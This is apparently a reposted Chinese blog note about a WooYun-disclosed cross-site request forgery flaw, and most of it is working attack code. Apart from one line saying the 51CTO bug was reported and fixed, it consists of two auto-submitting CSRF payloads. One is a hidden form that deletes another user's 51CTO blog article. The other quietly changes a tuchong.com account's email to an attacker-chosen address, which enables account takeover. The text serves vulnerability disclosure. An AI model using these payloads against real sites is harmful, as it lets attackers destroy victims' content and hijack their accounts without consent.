http://wooyun.org/bugs/wooyun-2010-052368
积极反馈给51CTO修复了。
漏洞可以删掉非自己的文章。
<form method='post'action='http://crazysmogu.blog.51cto.com/user_index.php?action=delarticle'> <input type='text'value='del'name='job'style='display:none!important;display:block;width=0;height=0'/> <input type='text'value='1112261'name='selid'style='display:none!important;display:block;width=0;height=0'/> </form> <script>document.forms[0].submit();</script>
<html>
<body>
<form name="csrf" action="http://tuchong.com/api/user/modify/" method="POST">
<input type=text name=section value="basicinfo"></input>
<script>
var email =['root1@wooyun.org','root2@wooyun.org','root3@wooyun.org','root4@wooyun.org','root5@wooyun.org','root6@wooyun.org','root7@wooyun.org','root8@wooyun.org','root9@wooyun.org','root10@wooyun.org'];
function Rand(arr, len) {
arr.sort(function () {
return Math.random()-0.5;
});
return arr.slice(0, len);
}
//alert(Rand(email,1));
document.write("<input type=text name=user_email value="+Rand(email,1)+"></input>");
</script>
<input type="submit" value="submit" />
</form>
<script>
document.csrf.submit();
</script>
</body>
</html>
转载于:https://blog.51cto.com/929044991/1383799